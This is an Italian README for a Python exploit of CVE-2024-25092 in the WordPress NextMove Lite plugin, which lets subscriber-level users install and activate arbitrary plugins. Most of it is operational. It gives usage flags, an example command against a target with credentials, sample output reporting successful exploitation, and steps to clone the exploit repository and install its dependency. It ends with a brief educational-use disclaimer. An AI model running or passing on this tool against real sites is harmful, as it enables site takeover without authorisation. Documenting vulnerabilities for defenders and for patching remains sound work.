
Vulnerabilità di installazione/attivazione arbitraria del plugin WordPress NextMove Lite <= 2.17.0 - Subscriber+
CVE-2024-25092 è una vulnerabilità ad alta gravità che colpisce il plugin WordPress NextMove Lite (versioni <= 2.17.0). Questa vulnerabilità consente a un utente con permessi da subscriber o superiori di installare e attivare plugin arbitrari su un sito WordPress a causa della mancanza di controlli di autorizzazione.
Il plugin XLPlugins NextMove Lite per WordPress presenta una vulnerabilità di autorizzazione mancante che consente a utenti autenticati con permessi di livello subscriber o superiori di eseguire installazioni e attivazioni arbitrarie di plugin. Ciò può portare a una compromissione completa del sito WordPress.
Lo script Python fornito automatizza lo sfruttamento di questa vulnerabilità effettuando l'accesso al sito WordPress e installando un plugin specificato.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsClona il repository:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Installa i pacchetti Python richiesti:
pip install requests
Questo script è destinato esclusivamente a scopi educativi. Usalo in modo responsabile e solo su sistemi per i quali hai esplicita autorizzazione. L'uso non autorizzato di questo script è illegale e non etico.